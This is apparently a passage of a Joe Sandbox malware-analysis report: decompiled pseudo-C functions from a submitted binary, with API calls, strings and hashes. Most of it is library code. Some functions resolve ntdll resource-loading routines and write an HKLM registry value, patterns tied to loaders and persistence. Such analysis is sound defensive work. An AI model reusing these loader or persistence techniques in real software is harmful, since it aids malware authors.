                                                      								if( *((intOrPtr*)(_t54 + 0x90)) == 0) {
                                                      									E0041A173(_t75, _t76,  *((intOrPtr*)(_t77 - 0x28)));
                                                      									E00411888(_t76);
                                                      									_push(_t76);
                                                      									E00402F0C(_t59, _t75, _t76, _t82);
                                                      								}
                                                      							}
                                                      						}
                                                      						_t33 =  *((intOrPtr*)(_t77 - 0x24));
                                                      					} while (_t33 != 0);
                                                      					goto L7;
                                                      				}
                                                      			}











                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 004120CC
                                                      • GetModuleHandleA.KERNEL32(?,004393E0,00000000), ref: 00412197
                                                      • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 004121A7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: AddressH_prolog3_HandleModuleProc
                                                      • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                      • API String ID: 2418878492-2500072749
                                                      • Opcode ID: b8a823503778c49e59a79fea30dc8b9f381be7c146b62c3227563022fb454cd2
                                                      • Instruction ID: 22469c7bcacca5b825b37335fd20bb5c9480a0c645dc819855c5a6f900c70753
                                                      • Opcode Fuzzy Hash: b8a823503778c49e59a79fea30dc8b9f381be7c146b62c3227563022fb454cd2
                                                      • Instruction Fuzzy Hash: 5A319E31A00205ABCF15EFA1C9457EE77B5AF49304F1440AEE904EB292DBBCDD85CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E0040FD1D(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
                                                      				void* __ebx;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				intOrPtr _t29;
                                                      				intOrPtr _t32;
                                                      				intOrPtr _t35;
                                                      				intOrPtr _t36;
                                                      				intOrPtr _t37;
                                                      				signed int _t39;
                                                      				void* _t47;
                                                      				intOrPtr* _t48;
                                                      				void* _t50;
                                                      				void* _t51;
                                                      				void* _t64;
                                                      				void* _t65;
                                                      				intOrPtr _t66;
                                                      				void* _t68;
                                                      				void* _t70;
                                                      
                                                      				_t65 = __edi;
                                                      				_t64 = __edx;
                                                      				_t51 = E0040DBC7(_t50, __ecx, __edi, _t68, __eflags);
                                                      				_t29 =  *((intOrPtr*)(_t51 + 0x10));
                                                      				if(_t29 == 0) {
                                                      					L19:
                                                      					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
                                                      				}
                                                      				_t32 = _t29 - 1;
                                                      				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
                                                      				if(_t32 != 0) {
                                                      					goto L19;
                                                      				}
                                                      				if(_a4 == 0) {
                                                      					L8:
                                                      					_push(_t65);
                                                      					_t66 =  *((intOrPtr*)(E0040DB94(_t51, _t65, 0, _t77) + 4));
                                                      					_t70 = E0040F089(0x44642c);
                                                      					if(_t70 == 0 || _t66 == 0) {
                                                      						L18:
                                                      						goto L19;
                                                      					} else {
                                                      						_t35 =  *((intOrPtr*)(_t70 + 0xc));
                                                      						_t80 = _t35;
                                                      						if(_t35 == 0) {
                                                      							L12:
                                                      							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
                                                      								_t36 =  *((intOrPtr*)(_t70 + 0xc));
                                                      								_a4 = _a4 & 0x00000000;
                                                      								_t83 = _t36;
                                                      								if(_t36 != 0) {
                                                      									_push(_t36);
                                                      									_t39 = E00421C45(_t51, _t64, _t66, _t70, _t83);
                                                      									_push( *((intOrPtr*)(_t70 + 0xc)));
                                                      									_a4 = _t39;
                                                      									E0041E18A(_t51, _t66, _t70, _t83);
                                                      								}
                                                      								_t37 = E0041ECA7(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
                                                      								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
                                                      								if(_t37 == 0 && _a4 != _t37) {
                                                      									 *((intOrPtr*)(_t70 + 0xc)) = E0041ECA7(_t51, _t64, _t66, _t70, _a4);
                                                      								}
                                                      							}
                                                      							goto L18;
                                                      						}
                                                      						_push(_t35);
                                                      						if(E00421C45(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
                                                      							goto L18;
                                                      						}
                                                      						goto L12;
                                                      					}
                                                      				}
                                                      				if(_a4 != 0xffffffff) {
                                                      					_t47 = E00404C1E();
                                                      					if(_t47 != 0) {
                                                      						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
                                                      						_t77 = _t48;
                                                      						if(_t48 != 0) {
                                                      							 *_t48(0, 0);
                                                      						}
                                                      					}
                                                      				}
                                                      				E0040FC51( *((intOrPtr*)(_t51 + 0x20)), _t65);
                                                      				E0040FC51( *((intOrPtr*)(_t51 + 0x1c)), _t65);
                                                      				E0040FC51( *((intOrPtr*)(_t51 + 0x18)), _t65);
                                                      				E0040FC51( *((intOrPtr*)(_t51 + 0x14)), _t65);
                                                      				E0040FC51( *((intOrPtr*)(_t51 + 0x24)), _t65);
                                                      				goto L8;
                                                      			}






















                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: __msize_malloc
                                                      • String ID: ,dD
                                                      • API String ID: 1288803200-3191229884
                                                      • Opcode ID: 58876fb9e627804367ae5f76963656d2a1121e4b44d7c996d452b15496b7a07f
                                                      • Instruction ID: 2f4e633648d44568a440bb3fa2de23a969c37f1f238f370252bd419c8cc87b54
                                                      • Opcode Fuzzy Hash: 58876fb9e627804367ae5f76963656d2a1121e4b44d7c996d452b15496b7a07f
                                                      • Instruction Fuzzy Hash: 5E2173315002109FDB34AF72D885A6B77A4BF44714B14853FEC19AAAD6DB38EC85CBD8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0042CC9A() {
                                                      				intOrPtr _t5;
                                                      				intOrPtr _t6;
                                                      				intOrPtr _t10;
                                                      				void* _t12;
                                                      				intOrPtr _t15;
                                                      				intOrPtr* _t16;
                                                      				signed int _t19;
                                                      				signed int _t20;
                                                      				intOrPtr _t26;
                                                      				intOrPtr _t27;
                                                      
                                                      				_t5 =  *0x4483c0;
                                                      				_t26 = 0x14;
                                                      				if(_t5 != 0) {
                                                      					if(_t5 < _t26) {
                                                      						_t5 = _t26;
                                                      						goto L4;
                                                      					}
                                                      				} else {
                                                      					_t5 = 0x200;
                                                      					L4:
                                                      					 *0x4483c0 = _t5;
                                                      				}
                                                      				_t6 = E004265A8(_t5, 4);
                                                      				 *0x4473b8 = _t6;
                                                      				if(_t6 != 0) {
                                                      					L8:
                                                      					_t19 = 0;
                                                      					_t15 = 0x4442e0;
                                                      					while(1) {
                                                      						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                                                      						_t15 = _t15 + 0x20;
                                                      						_t19 = _t19 + 4;
                                                      						if(_t15 >= 0x444560) {
                                                      							break;
                                                      						}
                                                      						_t6 =  *0x4473b8; // 0x2351ea8
                                                      					}
                                                      					_t27 = 0xfffffffe;
                                                      					_t20 = 0;
                                                      					_t16 = 0x4442f0;
                                                      					do {
                                                      						_t10 =  *((intOrPtr*)((_t20 & 0x0000001f) * 0x28 +  *((intOrPtr*)(0x4483e0 + (_t20 >> 5) * 4))));
                                                      						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                                                      							 *_t16 = _t27;
                                                      						}
                                                      						_t16 = _t16 + 0x20;
                                                      						_t20 = _t20 + 1;
                                                      					} while (_t16 < 0x444350);
                                                      					return 0;
                                                      				} else {
                                                      					 *0x4483c0 = _t26;
                                                      					_t6 = E004265A8(_t26, 4);
                                                      					 *0x4473b8 = _t6;
                                                      					if(_t6 != 0) {
                                                      						goto L8;
                                                      					} else {
                                                      						_t12 = 0x1a;
                                                      						return _t12;
                                                      					}
                                                      				}
                                                      			}














                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: __calloc_crt
                                                      • String ID: PCD$`ED$BD
                                                      • API String ID: 3494438863-3786296796
                                                      • Opcode ID: ee61e886c595784a642732bd44bf13424e53494a76758dd75d135ed60843f2d1
                                                      • Instruction ID: 5d6bc2e65ec50afa7cfd9c24b92ad8cceccf8fb15337d2a1a44d9866e0da7712
                                                      • Opcode Fuzzy Hash: ee61e886c595784a642732bd44bf13424e53494a76758dd75d135ed60843f2d1
                                                      • Instruction Fuzzy Hash: 6F11E7323482205BF7149F6EBCD076E2791FB96B24BA4413FF905C7294DB3C8882468C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E00407923(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
                                                      				void _v20;
                                                      				int _t14;
                                                      				int _t18;
                                                      				intOrPtr* _t23;
                                                      				void* _t25;
                                                      
                                                      				if(E00407777() == 0) {
                                                      					if(_a4 != 0x12340042) {
                                                      						L9:
                                                      						_t14 = 0;
                                                      						L10:
                                                      						return _t14;
                                                      					}
                                                      					_t23 = _a8;
                                                      					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                                                      						goto L9;
                                                      					} else {
                                                      						 *((intOrPtr*)(_t23 + 4)) = 0;
                                                      						 *((intOrPtr*)(_t23 + 8)) = 0;
                                                      						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
                                                      						_t18 = GetSystemMetrics(1);
                                                      						asm("movsd");
                                                      						asm("movsd");
                                                      						asm("movsd");
                                                      						asm("movsd");
                                                      						 *(_t23 + 0x10) = _t18;
                                                      						 *((intOrPtr*)(_t23 + 0x24)) = 1;
                                                      						if( *_t23 >= 0x48) {
                                                      							E004215F5(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
                                                      						}
                                                      						_t14 = 1;
                                                      						goto L10;
                                                      					}
                                                      				}
                                                      				return  *0x446290(_a4, _a8);
                                                      			}









                                                      APIs
                                                      • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 00407961
                                                      • GetSystemMetrics.USER32 ref: 00407979
                                                      • GetSystemMetrics.USER32 ref: 00407980
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: System$Metrics$InfoParameters
                                                      • String ID: B$DISPLAY
                                                      • API String ID: 3136151823-3316187204
                                                      • Opcode ID: 2926c6d18e6f0b630ebea8befa15ebd50504e40b77fdf81e56c32f1ff9cf5217
                                                      • Instruction ID: f4921b07837d5c35b9459696712d0f96a64d958530ee0b5bfefb63986bd7101a
                                                      • Opcode Fuzzy Hash: 2926c6d18e6f0b630ebea8befa15ebd50504e40b77fdf81e56c32f1ff9cf5217
                                                      • Instruction Fuzzy Hash: BA11CAB1A04324ABDF119F649D81A9B7B68EF09750F004077FD05BE196D2B5F900CBEA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00405D8B(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
                                                      				void* __edi;
                                                      				struct HWND__* _t10;
                                                      				struct HWND__* _t12;
                                                      				struct HWND__* _t14;
                                                      				struct HWND__* _t15;
                                                      				int _t19;
                                                      				void* _t21;
                                                      				void* _t25;
                                                      				struct HWND__** _t26;
                                                      				void* _t27;
                                                      
                                                      				_t25 = __edx;
                                                      				_t21 = __ebx;
                                                      				_t26 = _a4;
                                                      				_t27 = __ecx;
                                                      				if(E0040810E(__ecx, __eflags, _t26) == 0) {
                                                      					_t10 = E0040A584(__ecx);
                                                      					__eflags = _t10;
                                                      					if(_t10 == 0) {
                                                      						L5:
                                                      						__eflags = _t26[1] - 0x100;
                                                      						if(_t26[1] != 0x100) {
                                                      							L13:
                                                      							return E00408550(_t26);
                                                      						}
                                                      						_t12 = _t26[2];
                                                      						__eflags = _t12 - 0x1b;
                                                      						if(_t12 == 0x1b) {
                                                      							L8:
                                                      							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
                                                      							if(__eflags == 0) {
                                                      								goto L13;
                                                      							}
                                                      							_t14 = E0040F7F5(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
                                                      							__eflags = _t14;
                                                      							if(_t14 == 0) {
                                                      								goto L13;
                                                      							}
                                                      							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
                                                      							__eflags = _t15;
                                                      							if(_t15 == 0) {
                                                      								L12:
                                                      								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
                                                      								goto L1;
                                                      							}
                                                      							_t19 = IsWindowEnabled(_t15);
                                                      							__eflags = _t19;
                                                      							if(_t19 == 0) {
                                                      								goto L13;
                                                      							}
                                                      							goto L12;
                                                      						}
                                                      						__eflags = _t12 - 3;
                                                      						if(_t12 != 3) {
                                                      							goto L13;
                                                      						}
                                                      						goto L8;
                                                      					}
                                                      					__eflags =  *(_t10 + 0x68);
                                                      					if( *(_t10 + 0x68) == 0) {
                                                      						goto L5;
                                                      					}
                                                      					return 0;
                                                      				}
                                                      				L1:
                                                      				return 1;
                                                      			}














                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Edit
                                                      • API String ID: 0-554135844
                                                      • Opcode ID: cadf5cdf105f9b2e6c32f1f83ab6765bdb8c0ead7ddf9359437142abd91223ca
                                                      • Instruction ID: 357ecc9c0fe06753b2f7ef8780776397737a938da9b130e61a6109f3b055d991
                                                      • Opcode Fuzzy Hash: cadf5cdf105f9b2e6c32f1f83ab6765bdb8c0ead7ddf9359437142abd91223ca
                                                      • Instruction Fuzzy Hash: B4018430210A01A7EA203B26DC09B9BB7A5EF94754F14483BB581F22E2DB7CDD61CD9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 50%
                                                      			E00401A70(void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				char _v16;
                                                      				struct HINSTANCE__* _v20;
                                                      				_Unknown_base(*)()* _v24;
                                                      				char _v28;
                                                      				_Unknown_base(*)()* _v32;
                                                      				char _v36;
                                                      				intOrPtr _v40;
                                                      				char _v44;
                                                      
                                                      				_v44 = 0;
                                                      				_v28 = 0;
                                                      				_v16 = _a8;
                                                      				_v12 = _a4;
                                                      				_v8 = _a12;
                                                      				_v20 = E00401A10(L"ntdll.dll");
                                                      				_v24 = GetProcAddress(_v20, "LdrFindResource_U");
                                                      				_v32 = GetProcAddress(_v20, "LdrAccessResource");
                                                      				_v40 = _v24(0x400000,  &_v16, 3,  &_v36);
                                                      				if(_v40 >= 0) {
                                                      					_v40 = _v32(0x400000, _v36,  &_v44,  &_v28);
                                                      					if(_v40 >= 0 && _a16 != 0) {
                                                      						 *_a16 = _v28;
                                                      					}
                                                      				}
                                                      				return _v44;
                                                      			}














                                                      APIs
                                                      • GetProcAddress.KERNEL32(?,LdrFindResource_U), ref: 00401AAF
                                                      • GetProcAddress.KERNEL32(?,LdrAccessResource), ref: 00401AC1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: AddressProc
                                                      • String ID: LdrAccessResource$LdrFindResource_U$ntdll.dll
                                                      • API String ID: 190572456-309990276
                                                      • Opcode ID: fd4fbc9ac952d96f1e106f0f94c6f3281e9f40c0831bf339fd2d1916f06a4695
                                                      • Instruction ID: 8a5841fff638097e8a695f73e2a584e1330be098e6ee4213b5b30c9d0d5cad24
                                                      • Opcode Fuzzy Hash: fd4fbc9ac952d96f1e106f0f94c6f3281e9f40c0831bf339fd2d1916f06a4695
                                                      • Instruction Fuzzy Hash: F521E7B4D002099FDB04DF94D945BEEBBB4FF88304F10446AE915B7290E778AA44CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00402560(intOrPtr __ecx, CHAR* _a4) {
                                                      				void* _v8;
                                                      				int _v12;
                                                      				long _v16;
                                                      				intOrPtr _v20;
                                                      				int _t18;
                                                      				char* _t27;
                                                      				char* _t28;
                                                      
                                                      				_v20 = __ecx;
                                                      				_v8 = 0;
                                                      				_v16 = 0;
                                                      				_t27 =  *0x442000; // 0x4346d4
                                                      				_v16 = RegCreateKeyExA(0x80000002, _t27, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12);
                                                      				if(_v16 == 0) {
                                                      					_t18 = lstrlenA(_a4);
                                                      					_t28 =  *0x442010; // 0x43465c
                                                      					_v16 = RegSetValueExA(_v8, _t28, 0, 1, _a4, _t18 + 1);
                                                      					RegCloseKey(_v8);
                                                      				}
                                                      				return _v16;
                                                      			}











                                                      APIs
                                                      • RegCreateKeyExA.ADVAPI32(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 00402598
                                                      • lstrlenA.KERNEL32(?), ref: 004025AB
                                                      • RegSetValueExA.ADVAPI32(00000000,0043465C,00000000,00000001,?,-00000001), ref: 004025C8
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004025D5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateValuelstrlen
                                                      • String ID: \FC
                                                      • API String ID: 1356686001-3541169775
                                                      • Opcode ID: c7a0b32510f0cb6109f82215027c5292be295ddd1e68631b43d5b4ef6fa880fd
                                                      • Instruction ID: 459d6452fb9c9d5ccab35ccbd8606333e30272a4718eec85ccb3f9d8e5713986
                                                      • Opcode Fuzzy Hash: c7a0b32510f0cb6109f82215027c5292be295ddd1e68631b43d5b4ef6fa880fd
                                                      • Instruction Fuzzy Hash: 8701EDB9A00208BBDB14DF94DD49FAEB7B9EB48700F108159F615A7280D6B56A00DFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 95%
                                                      			E0041295B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t55;
                                                      				signed int _t56;
                                                      				void* _t68;
                                                      
                                                      				_push(0x14);
                                                      				E0041F6EA(E00432C4E, __ebx, __edi, __esi);
                                                      				_t55 =  *((intOrPtr*)(_t68 + 0xc)) + 0x2cc;
                                                      				if(_t55 > 0xf) {
                                                      					L21:
                                                      					_t56 = 0;
                                                      				} else {
                                                      					switch( *((intOrPtr*)(( *(_t55 + 0x412b1b) & 0x000000ff) * 4 +  &M00412AF3))) {
                                                      						case 0:
                                                      							__eax =  *(__ebp + 0x10);
                                                      							 *__eax = 2;
                                                      							 *(__eax + 8) = 1;
                                                      							goto L4;
                                                      						case 1:
                                                      							_t59 =  *((intOrPtr*)(_t68 + 0x10));
                                                      							 *(_t59 + 8) =  *(_t59 + 8) | 0x0000ffff;
                                                      							goto L3;
                                                      						case 2:
                                                      							__esi =  *(__ebp + 0x10);
                                                      							__ecx =  *(__ebp + 8);
                                                      							 *__esi = 0xb;
                                                      							__eax = E00413008( *(__ebp + 8));
                                                      							__eax =  ~__eax;
                                                      							asm("sbb eax, eax");
                                                      							 *(__esi + 8) = __ax;
                                                      							goto L4;
                                                      						case 3:
                                                      							__eax =  *(__ebp + 0x10);
                                                      							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
                                                      							L3:
                                                      							 *_t59 = 0xb;
                                                      							goto L4;
                                                      						case 4:
                                                      							__eax = E0040EA5E();
                                                      							__ecx = __ebp + 0xc;
                                                      							__eax = E0040320E(__ebp + 0xc, __eax);
                                                      							__ecx = __ebp + 0xc;
                                                      							 *(__ebp - 4) = 1;
                                                      							__eax = E00403478(__ebp + 0xc, 0xf1c0);
                                                      							goto L19;
                                                      						case 5:
                                                      							__esi =  *(__ebp + 0x10);
                                                      							 *__esi = 3;
                                                      							__eax = GetThreadLocale();
                                                      							 *(__esi + 8) = __eax;
                                                      							goto L4;
                                                      						case 6:
                                                      							__eflags =  *(__esi + 0x5c) - 0xffffffff;
                                                      							if(__eflags == 0) {
                                                      								_push( *(__esi + 0x20));
                                                      								__ecx = __ebp - 0x20;
                                                      								__eax = E0040E75E(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
                                                      								 *(__esi + 0x20) = SendMessageA( *( *(__esi + 0x20) + 0x20), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x20) + 0x20));
                                                      								 *(__esi + 0x5c) = GetBkColor( *(__ebp - 0x18));
                                                      								__eax = GetTextColor( *(__ebp - 0x18));
                                                      								__ecx = __ebp - 0x20;
                                                      								 *(__esi + 0x60) = __eax;
                                                      								__eax = E0040E7B2(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
                                                      							}
                                                      							__eflags = __edi - 0xfffffd43;
                                                      							__eax =  *(__ebp + 0x10);
                                                      							 *__eax = 3;
                                                      							if(__edi != 0xfffffd43) {
                                                      								__esi =  *(__esi + 0x60);
                                                      							} else {
                                                      								__esi =  *(__esi + 0x5c);
                                                      							}
                                                      							 *(__eax + 8) = __esi;
                                                      							goto L4;
                                                      						case 7:
                                                      							__eflags =  *(__esi + 0x64);
                                                      							if(__eflags != 0) {
                                                      								L15:
                                                      								__edi =  *(__ebp + 0x10);
                                                      								 *__edi = 9;
                                                      								__eax =  *(__esi + 0x64);
                                                      								__ecx =  *__eax;
                                                      								_push(__eax);
                                                      								__eax =  *((intOrPtr*)( *__eax + 4))();
                                                      								__eax =  *(__esi + 0x64);
                                                      								 *(__edi + 8) = __eax;
                                                      								goto L4;
                                                      							} else {
                                                      								__ecx =  *(__esi + 0x20);
                                                      								__eax = E00411C9F( *(__esi + 0x20));
                                                      								__ecx = __esi;
                                                      								__eax = E00412822(__ebx, __esi, __edi, __esi, __eflags, __eax);
                                                      								__eflags =  *(__esi + 0x64);
                                                      								if( *(__esi + 0x64) == 0) {
                                                      									goto L21;
                                                      								} else {
                                                      									goto L15;
                                                      								}
                                                      							}
                                                      							goto L22;
                                                      						case 8:
                                                      							__eax = E0040EA5E();
                                                      							__ecx = __ebp + 0xc;
                                                      							__eax = E0040320E(__ebp + 0xc, __eax);
                                                      							_t44 = __ebp - 4;
                                                      							 *_t44 =  *(__ebp - 4) & 0x00000000;
                                                      							__eflags =  *_t44;
                                                      							L19:
                                                      							__esi =  *(__ebp + 0x10);
                                                      							__ecx = __ebp + 0xc;
                                                      							 *__esi = 8;
                                                      							__eax = E0040A240(__ebp + 0xc);
                                                      							__ecx =  *(__ebp + 0xc);
                                                      							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
                                                      							 *(__esi + 8) = __eax;
                                                      							__eax = E00403036( *(__ebp + 0xc) + 0xfffffff0, __edx);
                                                      							L4:
                                                      							_t56 = 1;
                                                      							goto L22;
                                                      						case 9:
                                                      							goto L21;
                                                      					}
                                                      				}
                                                      				L22:
                                                      				return E0041F7C2(_t56);
                                                      			}







                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00412962
                                                      • SendMessageA.USER32(?,00000138,?,?), ref: 004129DA
                                                      • GetBkColor.GDI32(?), ref: 004129E3
                                                      • GetTextColor.GDI32(?), ref: 004129EF
                                                      • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 00412A81
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                      • String ID:
                                                      • API String ID: 187318432-0
                                                      • Opcode ID: e95946eb13d09b0138d39ad7df32a0f0b4675811a65c7620a99874e0fb4b9fbf
                                                      • Instruction ID: 105b4171879299afdcc85ecd79fbceca975293f7ace257aaf3855ae8da3ba32c
                                                      • Opcode Fuzzy Hash: e95946eb13d09b0138d39ad7df32a0f0b4675811a65c7620a99874e0fb4b9fbf
                                                      • Instruction Fuzzy Hash: 8E419D71500305DFCB20DF65C944ADE77B0FF04314F10896EE896AB3A1D7B8A9A1CB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E00405482(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* __ebp;
                                                      				signed int _t25;
                                                      				signed int _t30;
                                                      				void* _t32;
                                                      				signed int _t34;
                                                      				signed int _t42;
                                                      				intOrPtr _t43;
                                                      				void* _t44;
                                                      				char** _t54;
                                                      				intOrPtr _t55;
                                                      				intOrPtr _t58;
                                                      				char* _t59;
                                                      				void* _t61;
                                                      
                                                      				_t42 = __ebx;
                                                      				_t59 = _t61 - 0x104;
                                                      				_t25 =  *0x443590; // 0xa920217c
                                                      				_t59[0x108] = _t25 ^ _t59;
                                                      				_push(0x18);
                                                      				E0041F71D(E00431D33, __ebx, __edi, __esi);
                                                      				_t54 = _t59[0x118];
                                                      				_t44 = _t59[0x114];
